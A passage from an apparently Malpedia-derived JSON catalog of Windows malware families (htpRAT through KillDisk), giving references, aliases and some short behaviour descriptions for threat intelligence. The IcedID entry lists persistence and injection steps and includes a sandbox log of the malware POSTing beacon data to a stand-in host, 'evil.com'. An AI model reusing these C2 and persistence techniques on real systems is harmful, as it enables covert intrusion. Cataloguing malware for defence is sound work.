"https://www.riskiq.com/blog/labs/htprat/" ], "synonyms": [], "type": [] }, "uuid": "e8d1a1f3-3170-4562-9a18-cadf000e48d0", "value": "htpRAT" }, { "description": "", "meta": { "refs": [ "https://malpedia.caad.fkie.fraunhofer.de/details/win.htran", "https://blog.trendmicro.com/trendlabs-security-intelligence/in-depth-look-apt-attack-tools-of-the-trade/", "https://www.secureworks.com/research/htran" ], "synonyms": [ "HUC Packet Transmit Tool" ], "type": [] }, "uuid": "3fb18a77-91ef-4c68-a9a9-fa6bdbea38e8", "value": "HTran" }, { "description": "", "meta": { "refs": [ "https://malpedia.caad.fkie.fraunhofer.de/details/win.httpbrowser", "https://www.threatconnect.com/blog/threatconnect-discovers-chinese-apt-activity-in-europe/" ], "synonyms": [], "type": [] }, "uuid": "79f93d04-f6c8-4705-9395-7f575a61e82f", "value": "HttpBrowser" }, { "description": "", "meta": { "refs": [ "https://malpedia.caad.fkie.fraunhofer.de/details/win.httpdropper", "https://www.sans.org/reading-room/whitepapers/critical/tracing-lineage-darkseoul-36787", "https://paper.seebug.org/papers/APT/APT_CyberCriminal_Campagin/2013/dissecting-operation-troy.pdf", "http://www.malware-reversing.com/2013/04/5-south-korea-incident-new-malware.html" ], "synonyms": [ "httpdr0pper" ], "type": [] }, "uuid": "78336551-c18e-47ac-8bef-1c0c61c0e0a9", "value": "httpdropper" }, { "description": "", "meta": { "refs": [ "https://malpedia.caad.fkie.fraunhofer.de/details/win.http_troy", "https://www.mcafee.com/enterprise/en-us/assets/white-papers/wp-dissecting-operation-troy.pdf", "http://www.malware-reversing.com/2013/04/5-south-korea-incident-new-malware.html" ], "synonyms": [], "type": [] }, "uuid": "339b3e7c-7a4a-4a1a-94b6-555f15a0b265", "value": "http_troy" }, { "description": "", "meta": { "refs": [ "https://malpedia.caad.fkie.fraunhofer.de/details/win.hworm", "http://researchcenter.paloaltonetworks.com/2016/10/unit42-houdinis-magic-reappearance/?adbsc=social67221546&adbid=790972447373668352&adbpl=tw&adbpr=4487645412", "http://blogs.360.cn/post/analysis-of-apt-c-37.html" ], "synonyms": [ "houdini" ], "type": [] }, "uuid": "94466a80-964f-467e-b4b3-0e1375174464", "value": "Hworm" }, { "description": "", "meta": { "refs": [ "https://malpedia.caad.fkie.fraunhofer.de/details/win.hyperbro", "https://securelist.com/luckymouse-hits-national-data-center/86083/" ], "synonyms": [], "type": [] }, "uuid": "b7f1abd3-870b-42ca-9bd1-5931126c68d5", "value": "HyperBro" }, { "description": "Analysis Observations:\r\n\r\n* It sets up persistence by creating a Scheduled Task with the following characteristics:\r\n * Name: Update\r\n * Trigger: At Log on\r\n * Action: %LocalAppData%\\$Example\\\\waroupada.exe /i\r\n * Conditions: Stop if the computer ceases to be idle.\r\n* The sub-directory within %LocalAppdata%, Appears to be randomly picked from the list of directories within %ProgramFiles%. This needs more verification.\r\n* The filename remained static during analysis.\r\n* The original malware exe (ex. waroupada.exe) will spawn an instance of svchost.exe as a sub-process and then inject/execute its malicious code within it\r\n* If “/i” is not passed as an argument, it sets up persistence and waits for reboot.\r\n* If “/I” is passed as an argument (as is the case when the scheduled task is triggered at login), it skips persistence setup and actually executes; resulting in C2 communication.\r\n* Employs an interesting method for sleeping by calling the Sleep function of kernel32.dll from the shell, like so:\r\n rundll32.exe kernel32,Sleep -s\r\n* Setup a local listener to proxy traffic on 127.0.0.1:50000\r\n\r\n**[Example Log from C2 Network Communication]**\r\n[2018-03-19 12:45:55] [42078] [https_443_tcp 44785] [172.16.0.130:54803] connect\r\n[2018-03-19 12:45:55] [42078] [https_443_tcp 44785] [172.16.0.130:54803] recv: POST /forum/posting.php?a=0&b=4FC0302F4C59D8CDB8&d=0&e=63&f=0&g=0&h=0&r=0&i=266390&j=11 HTTP/1.1\r\n[2018-03-19 12:45:55] [42078] [https_443_tcp 44785] [172.16.0.130:54803] recv: Connection: close\r\n[2018-03-19 12:45:55] [42078] [https_443_tcp 44785] [172.16.0.130:54803] recv: Content-Type: application/x-www-form-urlencoded\r\n[2018-03-19 12:45:55] [42078] [https_443_tcp 44785] [172.16.0.130:54803] recv: Content-Length: 196\r\n[2018-03-19 12:45:55] [42078] [https_443_tcp 44785] [172.16.0.130:54803] recv: Host: evil.com\r\n[2018-03-19 12:45:55] [42078] [https_443_tcp 44785] [172.16.0.130:54803] recv: <(POSTDATA)>\r\n[2018-03-19 12:45:55] [42078] [https_443_tcp 44785] [172.16.0.130:54803] info: POST data stored to: /var/lib/inetsim/http/postdata/a90b931cb23df85aa6e3f0039958b031c3b053a2\r\n[2018-03-19 12:45:55] [42078] [https_443_tcp 44785] [172.16.0.130:54803] info: **Request URL: hxxps://evil.com/forum/posting.php?a=0&b=4FC0302F4C59D8CDB8&d=0&e=63&f=0&g=0&h=0&r=0&i=266390&j=11**\r\n[2018-03-19 12:45:55] [42078] [https_443_tcp 44785] [172.16.0.130:54803] info: Sending fake file configured for extension 'php'.\r\n[2018-03-19 12:45:55] [42078] [https_443_tcp 44785] [172.16.0.130:54803] send: HTTP/1.1 200 OK\r\n[2018-03-19 12:45:55] [42078] [https_443_tcp 44785] [172.16.0.130:54803] send: Content-Type: text/html\r\n[2018-03-19 12:45:55] [42078] [https_443_tcp 44785] [172.16.0.130:54803] send: Server: INetSim HTTPs Server\r\n[2018-03-19 12:45:55] [42078] [https_443_tcp 44785] [172.16.0.130:54803] send: Date: Mon, 19 Mar 2018 16:45:55 GMT\r\n[2018-03-19 12:45:55] [42078] [https_443_tcp 44785] [172.16.0.130:54803] send: Connection: Close\r\n[2018-03-19 12:45:55] [42078] [https_443_tcp 44785] [172.16.0.130:54803] send: Content-Length: 258\r\n[2018-03-19 12:45:55] [42078] [https_443_tcp 44785] [172.16.0.130:54803] info: Sending file: /var/lib/inetsim/http/fakefiles/sample.html\r\n[2018-03-19 12:45:55] [42078] [https_443_tcp 44785] [172.16.0.130:54803] stat: 1 **method=POST url=hxxps://evil.com/forum/posting.php?a=0&b=4FC0302F4C59D8CDB8&d=0&e=63&f=0&g=0&h=0&r=0&i=266390&j=11** sent=/var/lib/inetsim/http/fakefiles/sample.html postdata=/var/lib/inetsim/http/postdata/a90b931cb23df85aa6e3f0039958b031c3b053a2", "meta": { "refs": [ "https://malpedia.caad.fkie.fraunhofer.de/details/win.icedid", "https://blog.talosintelligence.com/2018/04/icedid-banking-trojan.html", "https://digitalguardian.com/blog/iceid-banking-trojan-targeting-banks-payment-card-providers-e-commerce-sites", "https://www.fidelissecurity.com/threatgeek/2017/11/tracking-emotet-payload-icedid", "https://securityintelligence.com/icedid-operators-using-atsengine-injection-panel-to-hit-e-commerce-sites/", "https://www.youtube.com/watch?v=wObF9n2UIAM", "https://securityintelligence.com/new-banking-trojan-icedid-discovered-by-ibm-x-force-research/", "https://www.youtube.com/watch?v=7Dk7NkIbVqY", "https://www.crowdstrike.com/blog/digging-into-bokbots-core-module/", "https://www.vkremez.com/2018/09/lets-learn-deeper-dive-into.html", "http://www.intezer.com/icedid-banking-trojan-shares-code-pony-2-0-trojan/", "https://blog.fox-it.com/2018/08/09/bokbot-the-rebirth-of-a-banker/", "https://www.crowdstrike.com/blog/bokbots-man-in-the-browser-overview/", "https://www.crowdstrike.com/blog/sin-ful-spiders-wizard-spider-and-lunar-spider-sharing-the-same-web/" ], "synonyms": [ "BokBot" ], "type": [] }, "uuid": "26f5afaf-0bd7-4741-91ab-917bdd837330", "value": "IcedID" }, { "description": "", "meta": { "refs": [ "https://malpedia.caad.fkie.fraunhofer.de/details/win.icedid_downloader", "http://www.intezer.com/icedid-banking-trojan-shares-code-pony-2-0-trojan/", "https://securityintelligence.com/new-banking-trojan-icedid-discovered-by-ibm-x-force-research/" ], "synonyms": [], "type": [] }, "uuid": "c3be9189-f8f2-45e4-b6a3-8960fd5ffc16", "value": "IcedID Downloader" }, { "description": "", "meta": { "refs": [ "https://malpedia.caad.fkie.fraunhofer.de/details/win.icefog", "http://www.kz-cert.kz/page/502" ], "synonyms": [], "type": [] }, "uuid": "48cdcbcf-38a8-4c68-a85e-42989ca28861", "value": "Icefog" }, { "description": "", "meta": { "refs": [ "https://malpedia.caad.fkie.fraunhofer.de/details/win.ice_ix", "https://blog.trendmicro.com/trendlabs-security-intelligence/zeus-gets-another-update/", "https://securelist.com/ice-ix-not-cool-at-all/29111/", "https://www.virusbulletin.com/virusbulletin/2012/08/inside-ice-ix-bot-descendent-zeus" ], "synonyms": [], "type": [] }, "uuid": "44a1706e-f6dc-43ea-ac85-9a4f2407b9a3", "value": "Ice IX" }, { "description": "", "meta": { "refs": [ "https://malpedia.caad.fkie.fraunhofer.de/details/win.idkey", "https://isc.sans.edu/diary/22766" ], "synonyms": [], "type": [] }, "uuid": "3afecded-3461-45f9-8159-e8328e56a916", "value": "IDKEY" }, { "description": "", "meta": { "refs": [ "https://malpedia.caad.fkie.fraunhofer.de/details/win.iisniff", "https://www.trustwave.com/Resources/SpiderLabs-Blog/The-Curious-Case-of-the-Malicious-IIS-Module/" ], "synonyms": [], "type": [] }, "uuid": "3b746f77-214b-44f9-9ef2-0ae6b52561d6", "value": "IISniff" }, { "description": "", "meta": { "refs": [ "https://malpedia.caad.fkie.fraunhofer.de/details/win.imecab", "https://www.symantec.com/blogs/threat-intelligence/leafminer-espionage-middle-east" ], "synonyms": [], "type": [] }, "uuid": "0ea585ef-bd32-4f5b-a3fe-bb48dc0956c7", "value": "Imecab" }, { "description": "", "meta": { "refs": [ "https://malpedia.caad.fkie.fraunhofer.de/details/win.imminent_monitor_rat", "https://ti.360.net/blog/articles/apt-c-36-continuous-attacks-targeting-colombian-government-institutions-and-corporations-en/", "https://itsjack.cc/blog/2016/01/imminent-monitor-4-rat-analysis-a-glance/" ], "synonyms": [], "type": [] }, "uuid": "53021414-97ad-4102-9cff-7a0e1997f867", "value": "Imminent Monitor RAT" }, { "description": "", "meta": { "refs": [ "https://malpedia.caad.fkie.fraunhofer.de/details/win.infy", "http://researchcenter.paloaltonetworks.com/2016/06/unit42-prince-of-persia-game-over/", "https://researchcenter.paloaltonetworks.com/2016/05/prince-of-persia-infy-malware-active-in-decade-of-targeted-attacks/", "https://www.intezer.com/prince-of-persia-the-sands-of-foudre/", "https://github.com/pan-unit42/iocs/blob/master/prince_of_persia/hashes.csv", "https://researchcenter.paloaltonetworks.com/2017/08/unit42-prince-persia-ride-lightning-infy-returns-foudre/" ], "synonyms": [ "Foudre" ], "type": [] }, "uuid": "53616ce4-9b8e-45a0-b380-9e778cd95ae2", "value": "Infy" }, { "description": "InnaputRAT, a RAT capable of exfiltrating files from victim machines, was distributed by threat actors using phishing and Godzilla Loader. The RAT has evolved through multiple variants dating back to 2016. Recent campaigns distributing InnaputRAT beaconed to live C2 as of March 26, 2018.", "meta": { "refs": [ "https://malpedia.caad.fkie.fraunhofer.de/details/win.innaput_rat", "https://asert.arbornetworks.com/innaput-actors-utilize-remote-access-trojan-since-2016-presumably-targeting-victim-files/" ], "synonyms": [], "type": [] }, "uuid": "dd486e92-54fe-4306-9aab-05863cb6c6e1", "value": "InnaputRAT" }, { "description": "", "meta": { "refs": [ "https://malpedia.caad.fkie.fraunhofer.de/details/win.invisimole", "https://www.welivesecurity.com/2018/06/07/invisimole-equipped-spyware-undercover/" ], "synonyms": [], "type": [] }, "uuid": "22755fda-497e-4ef0-823e-5cb6d8701420", "value": "InvisiMole" }, { "description": " IRONHALO is a downloader that uses the HTTP protocol to retrieve a Base64 encoded payload from a hard-coded command-and-control (CnC) server and uniform resource locator (URL) path.\r\n The encoded payload is written to a temporary file, decoded and executed in a hidden window. The encoded and decoded payloads are written to files named igfxHK[%rand%].dat and igfxHK[%rand%].exe respectively, where [%rand%] is a 4-byte hexadecimal number based on the current timestamp. It persists by copying itself to the current user’s Startup folder.", "meta": { "refs": [ "https://malpedia.caad.fkie.fraunhofer.de/details/win.ironhalo", "https://www.symantec.com/security-center/writeup/2015-122210-5128-99", "https://www.fireeye.com/blog/threat-research/2015/12/the-eps-awakens-part-two.html", "https://www.fireeye.com/blog/threat-research/2015/12/the_eps_awakens.html" ], "synonyms": [], "type": [] }, "uuid": "44599616-3849-4960-9379-05307287ff80", "value": "IRONHALO" }, { "description": "2006 Gozi v1.0, Gozi CRM, CRM, Papras\r\n2010 Gozi v2.0, Gozi ISFB, ISFB, Pandemyia(*)\r\n\r\nIn September 2010, the source code of a particular Gozi CRM dll version was leaked. This led to two main branches: one became known as Gozi Prinimalka, which was merge with Pony and became Vawtrak/Neverquest.\r\n\r\nThe other branch became known as Gozi ISFB, or ISFB in short. Webinject functionality was added to this version.\r\n\r\nThere is one panel which often was used in combination with ISFB: IAP. The panel's login page comes with the title 'Login - IAP'. The body contains 'AUTHORIZATION', 'Name:', 'Password:' and a single button 'Sign in' in a minimal design. Often, the panel is directly accessible by entering the C2 IP address in a browser. But there are ISFB versions which are not directly using IAP. The bot accesses a gate, which is called the 'Dreambot' gate. See win.dreambot for further information.\r\n\r\nISFB often was protected by Rovnix. This led to a further complication in the naming scheme - many companies started to call ISFB Rovnix. Because the signatures started to look for Rovnix, other trojans protected by Rovnix (in particular ReactorBot and Rerdom) sometimes got wrongly labelled.\r\n\r\nIn April 2016 a combination of Gozi ISFB and Nymaim was detected. This breed became known as GozNym. The merge uses a shellcode-like version of Gozi ISFB, that needs Nymaim to run. The C2 communication is performed by Nymaim.\r\n\r\nSee win.gozi for additional historical information.", "meta": { "refs": [ "https://malpedia.caad.fkie.fraunhofer.de/details/win.isfb", "https://blog.trendmicro.com/trendlabs-security-intelligence/ursnif-emotet-dridex-and-bitpaymer-gangs-linked-by-a-similar-loader/", "https://blog.talosintelligence.com/2019/01/amp-tracks-ursnif.html", "https://blog.minerva-labs.com/attackers-insert-themselves-into-the-email-conversation-to-spread-malware", "https://lokalhost.pl/gozi_tree.txt", "https://isc.sans.edu/forums/diary/Reviewing+the+spam+filters+Malspam+pushing+GoziISFB/23245", "http://blog.talosintelligence.com/2018/03/gozi-isfb-remains-active-in-2018.html", "https://securityintelligence.com/meet-goznym-the-banking-malware-offspring-of-gozi-isfb-and-nymaim/", "https://www.cylance.com/en_us/blog/threat-spotlight-ursnif-infostealer-malware.html", "https://www.vkremez.com/2018/08/lets-learn-in-depth-reversing-of-recent.html", "https://www.youtube.com/watch?v=KvOpNznu_3w", "https://www.rsa.com/de-de/resources/pandemiya-emerges-new-malware-alternative-zeus-based", "https://www.youtube.com/watch?v=jlc7Ahp8Iqg", "http://benkow.cc/DreambotSAS19.pdf", "https://blog.malwarebytes.com/threat-analysis/2017/04/binary-options-malvertising-campaign-drops-isfb-banking-trojan/", "https://www.cyberbit.com/blog/endpoint-security/new-ursnif-malware-variant/", "https://journal.cecyf.fr/ojs/index.php/cybin/article/view/15", "https://0ffset.net/reverse-engineering/analyzing-com-mechanisms-in-malware/", "https://www.fireeye.com/blog/threat-research/2017/11/ursnif-variant-malicious-tls-callback-technique.html", "https://0ffset.net/reverse-engineering/malware-analysis/analysing-isfb-loader/", "https://arielkoren.com/blog/2016/11/01/ursnif-malware-deep-technical-dive/", "https://github.com/gbrindisi/malware/tree/master/windows/gozi-isfb", "https://blog.yoroi.company/research/ursnif-the-latest-evolution-of-the-most-popular-banking-malware/", "https://www.cybereason.com/blog/new-ursnif-variant-targets-japan-packed-with-new-features" ], "synonyms": [ "Gozi ISFB", "IAP", "Pandemyia" ], "type": [] }, "uuid": "a171321e-4968-4ac0-8497-3250c1f0d77d", "value": "ISFB" }, { "description": "", "meta": { "refs": [ "https://malpedia.caad.fkie.fraunhofer.de/details/win.ismagent", "http://www.clearskysec.com/ismagent/", "https://unit42.paloaltonetworks.com/dns-tunneling-in-the-wild-overview-of-oilrigs-dns-tunneling/" ], "synonyms": [], "type": [] }, "uuid": "67457708-1edd-4ef1-9ec0-1c5eb7c75fe2", "value": "ISMAgent" }, { "description": "", "meta": { "refs": [ "https://malpedia.caad.fkie.fraunhofer.de/details/win.ismdoor", "http://www.clearskysec.com/greenbug/", "https://www.symantec.com/connect/blogs/greenbug-cyberespionage-group-targeting-middle-east-possible-links-shamoon" ], "synonyms": [], "type": [] }, "uuid": "e09d8dd6-6857-4607-a0ba-9c8d2a66083b", "value": "ISMDoor" }, { "description": "", "meta": { "refs": [ "https://malpedia.caad.fkie.fraunhofer.de/details/win.ispy_keylogger", "https://www.zscaler.com/blogs/research/ispy-keylogger" ], "synonyms": [], "type": [] }, "uuid": "8c95cb51-1044-4dcd-9cac-ad9f2e3b9070", "value": "iSpy Keylogger" }, { "description": "", "meta": { "refs": [ "https://malpedia.caad.fkie.fraunhofer.de/details/win.israbye", "https://twitter.com/malwrhunterteam/status/1085162243795369984" ], "synonyms": [], "type": [] }, "uuid": "c5cec575-325c-44b8-af24-4feb330eec8a", "value": "IsraBye" }, { "description": "ISR Stealer is a modified version of the Hackhound Stealer. It is written in VB and often comes in a .NET-wrapper.\r\nISR Stealer makes use of two Nirsoft tools: Mail PassView and WebBrowserPassView.\r\n\r\nIncredibly, it uses an hard-coded user agent string: HardCore Software For : Public", "meta": { "refs": [ "https://malpedia.caad.fkie.fraunhofer.de/details/win.isr_stealer", "https://securingtomorrow.mcafee.com/mcafee-labs/phishing-attacks-employ-old-effective-password-stealer/" ], "synonyms": [], "type": [] }, "uuid": "27bab2fb-d324-42c2-9df3-669bb87c3989", "value": "ISR Stealer" }, { "description": "", "meta": { "refs": [ "https://malpedia.caad.fkie.fraunhofer.de/details/win.isspace", "http://researchcenter.paloaltonetworks.com/2017/01/unit42-dragonok-updates-toolset-targets-multiple-geographic-regions/" ], "synonyms": [], "type": [] }, "uuid": "a3f41c96-a5c8-4dfe-b7fa-d9d75f97979a", "value": "IsSpace" }, { "description": "", "meta": { "refs": [ "https://malpedia.caad.fkie.fraunhofer.de/details/win.jackpos", "https://www.trustwave.com/Resources/SpiderLabs-Blog/JackPOS-%E2%80%93-The-House-Always-Wins/" ], "synonyms": [], "type": [] }, "uuid": "3acb37f4-5614-4932-b12f-9f1c256895f2", "value": "JackPOS" }, { "description": "", "meta": { "refs": [ "https://malpedia.caad.fkie.fraunhofer.de/details/win.jaff", "http://malware-traffic-analysis.net/2017/05/16/index.html", "https://www.proofpoint.com/us/threat-insight/post/jaff-new-ransomware-from-actors-behind-distribution-of-dridex-locky-bart", "http://blog.talosintelligence.com/2017/05/jaff-ransomware.html" ], "synonyms": [], "type": [] }, "uuid": "2c51a717-726b-4813-9fcc-1265694b128e", "value": "Jaff" }, { "description": "", "meta": { "refs": [ "https://malpedia.caad.fkie.fraunhofer.de/details/win.jager_decryptor" ], "synonyms": [], "type": [] }, "uuid": "13a7a2ff-c945-4b42-a112-dcf09f9ed9c9", "value": "Jager Decryptor" }, { "description": "", "meta": { "refs": [ "https://malpedia.caad.fkie.fraunhofer.de/details/win.jaku", "https://www.forcepoint.com/sites/default/files/resources/files/report_jaku_analysis_of_botnet_campaign_en_0.pdf", "https://securelist.com/whos-really-spreading-through-the-bright-star/68978/", "https://www-01.ibm.com/support/docview.wss?uid=ssg1S1010146" ], "synonyms": [ "C3PRO-RACOON", "KCNA Infostealer", "Reconcyc" ], "type": [] }, "uuid": "0f02ea79-5833-46e0-8458-c4a863a5a112", "value": "Jaku" }, { "description": "", "meta": { "refs": [ "https://malpedia.caad.fkie.fraunhofer.de/details/win.jasus", "https://www.cylance.com/content/dam/cylance/pages/operation-cleaver/Cylance_Operation_Cleaver_Report.pdf" ], "synonyms": [], "type": [] }, "uuid": "af6e89ec-0adb-4ce6-b4e6-610827e722ea", "value": "Jasus" }, { "description": "Ransomware written in Go.", "meta": { "refs": [ "https://malpedia.caad.fkie.fraunhofer.de/details/win.jcry", "https://twitter.com/IdoNaor1/status/1101936940297924608", "https://twitter.com/0xffff0800/status/1102078898320302080" ], "synonyms": [], "type": [] }, "uuid": "fea703ec-9b24-4119-96b3-7ae6bec3b203", "value": "JCry" }, { "description": "", "meta": { "refs": [ "https://malpedia.caad.fkie.fraunhofer.de/details/win.jigsaw" ], "synonyms": [], "type": [] }, "uuid": "910c3fd2-56e5-4f1d-8df0-2aa0b293b7d9", "value": "Jigsaw" }, { "description": "", "meta": { "refs": [ "https://malpedia.caad.fkie.fraunhofer.de/details/win.jimmy", "https://securelist.com/jimmy-nukebot-from-neutrino-with-love/81667/" ], "synonyms": [], "type": [] }, "uuid": "551b568f-68fa-4483-a10c-a6452ae6289e", "value": "Jimmy" }, { "description": "", "meta": { "refs": [ "https://malpedia.caad.fkie.fraunhofer.de/details/win.joanap", "https://www.us-cert.gov/ncas/alerts/TA18-149A", "https://www.us-cert.gov/ncas/analysis-reports/AR18-149A", "https://www.acalvio.com/lateral-movement-technique-employed-by-hidden-cobra/" ], "synonyms": [], "type": [] }, "uuid": "bbbef449-2fe6-4c25-a85c-69af9fa6208b", "value": "Joanap" }, { "description": "", "meta": { "refs": [ "https://malpedia.caad.fkie.fraunhofer.de/details/win.joao", "https://www.welivesecurity.com/2017/08/22/gamescom-2017-fun-blackhats/" ], "synonyms": [], "type": [] }, "uuid": "8201c8d2-1dab-4473-bbdf-42952b3d5fc6", "value": "Joao" }, { "description": "", "meta": { "refs": [ "https://malpedia.caad.fkie.fraunhofer.de/details/win.jolob", "http://pwc.blogs.com/cyber_security_updates/2014/10/scanbox-framework-whos-affected-and-whos-using-it-1.html" ], "synonyms": [], "type": [] }, "uuid": "97f12ca8-dc84-4a8c-b4c6-8ec1d1e79631", "value": "Jolob" }, { "description": "", "meta": { "refs": [ "https://malpedia.caad.fkie.fraunhofer.de/details/win.jqjsnicker", "http://marcmaiffret.com/vault7/" ], "synonyms": [], "type": [] }, "uuid": "2e457b93-de45-4b1d-8e1d-b8d19c2c555a", "value": "JQJSNICKER" }, { "description": "", "meta": { "refs": [ "https://malpedia.caad.fkie.fraunhofer.de/details/win.jripbot", "https://securelist.com/blog/research/71275/wild-neutron-economic-espionage-threat-actor-returns-with-new-tricks/" ], "synonyms": [], "type": [] }, "uuid": "e895a0d2-fe4b-4793-9440-9db2d56a97f2", "value": "JripBot" }, { "description": "", "meta": { "refs": [ "https://malpedia.caad.fkie.fraunhofer.de/details/win.kagent", "https://www.cylance.com/content/dam/cylance/pages/operation-cleaver/Cylance_Operation_Cleaver_Report.pdf" ], "synonyms": [], "type": [] }, "uuid": "eab42a8e-22e7-49e4-8a26-44f14b6f67bb", "value": "KAgent" }, { "description": "", "meta": { "refs": [ "https://malpedia.caad.fkie.fraunhofer.de/details/win.karagany", "https://www.symantec.com/connect/blogs/dragonfly-western-energy-sector-targeted-sophisticated-attack-group" ], "synonyms": [], "type": [] }, "uuid": "857e61fe-ccb2-426b-ad7b-696112f48dbb", "value": "Karagany" }, { "description": "According to ASERT, Kardon Loader is a fully featured downloader, enabling the download and installation of other malware, eg. banking trojans/credential theft etc.This malware has been on sale by an actor under the username Yattaze, starting in late April. The actor offers the sale of the malware as a standalone build with charges for each additional rebuild, or the ability to set up a botshop in which case any customer can establish their own operation and further sell access to a new customer base.", "meta": { "refs": [ "https://malpedia.caad.fkie.fraunhofer.de/details/win.kardonloader", "https://asert.arbornetworks.com/kardon-loader-looks-for-beta-testers/", "https://engineering.salesforce.com/kardon-loader-malware-analysis-adaaaab42bab" ], "synonyms": [], "type": [] }, "uuid": "8b33ba21-9af7-4536-bd02-23dd863147e8", "value": "Kardon Loader" }, { "description": "According to checkpoint, Karius is a banking trojan in development, borrowing code from Ramnit, Vawtrack as well as Trickbot, currently implementing webinject attacks only.\r\n\r\nIt comes with an injector that loads an intermediate \"proxy\" component, which in turn loads the actual banker component.\r\n\r\nCommunication with the c2 are in json format and encrypted with RC4 with a hardcoded key.\r\n\r\nIn the initial version, observed in March 2018, the webinjects were hardcoded in the binary, while in subsequent versions, they were received by the c2.\r\n\r\n", "meta": { "refs": [ "https://malpedia.caad.fkie.fraunhofer.de/details/win.karius", "https://research.checkpoint.com/banking-trojans-development/", "https://dissectmalware.wordpress.com/2018/03/28/multi-stage-powershell-script/" ], "synonyms": [], "type": [] }, "uuid": "8a01c3be-17b7-4e5a-b0b2-6c1f5ccb82cf", "value": "Karius" }, { "description": "", "meta": { "refs": [ "https://malpedia.caad.fkie.fraunhofer.de/details/win.karkoff", "https://blog.talosintelligence.com/2019/04/dnspionage-brings-out-karkoff.html" ], "synonyms": [], "type": [] }, "uuid": "a45c16d9-6945-428c-af46-0436903f9329", "value": "Karkoff" }, { "description": "", "meta": { "refs": [ "https://malpedia.caad.fkie.fraunhofer.de/details/win.kasperagent", "http://researchcenter.paloaltonetworks.com/2017/04/unit42-targeted-attacks-middle-east-using-kasperagent-micropsia/", "https://www.threatconnect.com/blog/kasperagent-malware-campaign/" ], "synonyms": [], "type": [] }, "uuid": "d9c14095-8885-406c-b56b-06f3a1a88c1c", "value": "KasperAgent" }, { "description": "", "meta": { "refs": [ "https://malpedia.caad.fkie.fraunhofer.de/details/win.kazuar", "http://researchcenter.paloaltonetworks.com/2017/05/unit42-kazuar-multiplatform-espionage-backdoor-api-access/" ], "synonyms": [], "type": [] }, "uuid": "bab92070-3589-4b7e-bf05-4f54bfefc2ca", "value": "Kazuar" }, { "description": "", "meta": { "refs": [ "https://malpedia.caad.fkie.fraunhofer.de/details/win.kegotip" ], "synonyms": [], "type": [] }, "uuid": "96bb088c-7bb7-4a07-a9d7-a3cbb45d5755", "value": "Kegotip" }, { "description": "", "meta": { "refs": [ "https://malpedia.caad.fkie.fraunhofer.de/details/win.kelihos", "https://www.crowdstrike.com/blog/inside-the-takedown-of-zombie-spider-and-the-kelihos-botnet/", "https://www.wired.com/2017/04/fbi-took-russias-spam-king-massive-botnet/", "https://www.cyberscoop.com/doj-kelihos-botnet-peter-levashov-severa/", "https://en.wikipedia.org/wiki/Kelihos_botnet" ], "synonyms": [], "type": [] }, "uuid": "7d69892e-d582-4545-8798-4a9a84a821ea", "value": "Kelihos" }, { "description": "", "meta": { "refs": [ "https://malpedia.caad.fkie.fraunhofer.de/details/win.kerrdown", "https://unit42.paloaltonetworks.com/tracking-oceanlotus-new-downloader-kerrdown/", "https://blog.cystack.net/word-based-malware-attack/" ], "synonyms": [], "type": [] }, "uuid": "bd9e21d1-7da3-4699-816f-0e368a63bc18", "value": "KerrDown" }, { "description": "KeyBase is a .NET credential stealer and keylogger that first emerged in February 2015. It often incorporates Nirsoft tools such as MailPassView and WebBrowserPassView for additional credential grabbing.", "meta": { "refs": [ "https://malpedia.caad.fkie.fraunhofer.de/details/win.keybase", "https://unit42.paloaltonetworks.com/keybase-keylogger-malware-family-exposed/", "https://th3l4b.blogspot.com/2015/10/keybase-loggerclipboardcredsstealer.html", "https://unit42.paloaltonetworks.com/keybase-threat-grows-despite-public-takedown-a-picture-is-worth-a-thousand-words/", "https://community.rsa.com/community/products/netwitness/blog/2018/02/15/malspam-delivers-keybase-keylogger-2-11-2017", "https://voidsec.com/keybase-en/", "https://www.virusbulletin.com/virusbulletin/2016/07/new-keylogger-block/", "https://isc.sans.edu/forums/diary/Malicious+Office+files+using+fileless+UAC+bypass+to+drop+KEYBASE+malware/22011/" ], "synonyms": [ "Kibex" ], "type": [] }, "uuid": "8a7bb20e-7e90-4330-8f53-744bd5519f6f", "value": "KeyBase" }, { "description": "", "meta": { "refs": [ "https://malpedia.caad.fkie.fraunhofer.de/details/win.keyboy", "https://blog.trendmicro.com/trendlabs-security-intelligence/tropic-trooper-new-strategy/", "https://citizenlab.ca/2016/11/parliament-keyboy/", "https://www.pwc.co.uk/issues/cyber-security-data-privacy/research/the-keyboys-are-back-in-town.html", "https://blog.rapid7.com/2013/06/07/keyboy-targeted-attacks-against-vietnam-and-india/" ], "synonyms": [ "TSSL" ], "type": [] }, "uuid": "28c13455-7f95-40a5-9568-1e8732503507", "value": "KeyBoy" }, { "description": "", "meta": { "refs": [ "https://malpedia.caad.fkie.fraunhofer.de/details/win.keylogger_apt3", "https://intrusiontruth.wordpress.com/2017/05/09/apt3-is-boyusec-a-chinese-intelligence-contractor/", "https://twitter.com/smoothimpact/status/773631684038107136", "http://www.symantec.com/connect/blogs/buckeye-cyberespionage-group-shifts-gaze-us-hong-kong" ], "synonyms": [], "type": [] }, "uuid": "68039fbe-2eee-4666-b809-32a011e9852a", "value": "APT3 Keylogger" }, { "description": "", "meta": { "refs": [ "https://malpedia.caad.fkie.fraunhofer.de/details/win.keymarble", "https://www.us-cert.gov/ncas/analysis-reports/AR18-221A", "https://research.checkpoint.com/north-korea-turns-against-russian-targets/" ], "synonyms": [], "type": [] }, "uuid": "0c213d7f-8c71-4341-aeb0-13be71fbf4e5", "value": "KEYMARBLE" }, { "description": "", "meta": { "refs": [ "https://malpedia.caad.fkie.fraunhofer.de/details/win.khrat", "https://researchcenter.paloaltonetworks.com/2017/08/unit42-updated-khrat-malware-used-in-cambodia-attacks/", "https://blogs.forcepoint.com/security-labs/trojanized-adobe-installer-used-install-dragonok%E2%80%99s-new-custom-backdoor" ], "synonyms": [], "type": [] }, "uuid": "361d3f09-8bc8-4b5a-803f-8686cf346047", "value": "KHRAT" }, { "description": "", "meta": { "refs": [ "https://malpedia.caad.fkie.fraunhofer.de/details/win.kikothac", "https://www.group-ib.com/resources/threat-research/silence.html" ], "synonyms": [], "type": [] }, "uuid": "f2ca304f-6577-4f3a-983c-beec447a9493", "value": "Kikothac" }, { "description": "", "meta": { "refs": [ "https://malpedia.caad.fkie.fraunhofer.de/details/win.killdisk", "http://www.welivesecurity.com/2016/12/13/rise-telebots-analyzing-disruptive-killdisk-attacks/", "https://blog.trendmicro.com/trendlabs-security-intelligence/new-killdisk-variant-hits-financial-organizations-in-latin-america/" ], "synonyms": [], "type": [] }, "uuid": "e81f3e3f-966c-4c99-8d4b-fc0a1d3bb027", "value": "KillDisk" }, { "description": "", "meta": { "refs": [ 